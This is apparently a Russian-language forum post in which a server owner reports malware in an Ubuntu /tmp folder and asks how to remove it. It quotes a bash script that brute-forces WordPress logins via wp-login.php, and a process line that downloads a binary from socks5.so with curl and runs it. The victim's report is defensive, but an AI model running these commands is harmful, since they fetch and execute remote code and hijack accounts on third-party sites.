У меня есть необычные файлы в папке Ubuntu TMP. Может ли кто-нибудь пролить свет на это и каковы могут быть мои шаги по профилактике.
В папке temp есть 2 файла с именем Script и URL
Когда я нано файл сценария :
#!/bin/bash
if curl -s --max-time 7 -d "log=$1" -d "pwd=$2" -d "wp-submit=Log+In"
"$3"/wp-login.php -i |grep -a "path=/wp-content/pl$
then
echo $3 $1 $2
fi
и нано URL показывает не читаемые результаты
Далее по команде HTOP выполняется следующий вредоносный процесс
\par 2 S 0.0 0.0 0:00.00 sh -c cd /tmp;rm -rf url*;cd /tmp;rm -rf url;curl -O socks5.so/url;chmod 777 url;./url
\par 4 S 0.0 0.0 0:00.00 ./url
Когда запросите идентификатор процесса:
#ls -al /proc/12186/exe
Output is:
someuser someuser 0 Jun 17 06:06 /proc/12186/exe -> /bin/dash
когда я удаляю файлы в папке TEMP, она продолжает восстанавливаться, как я могу это остановить.Я полагаю, что он использует мой сервер для атаки на установленные веб-сайты.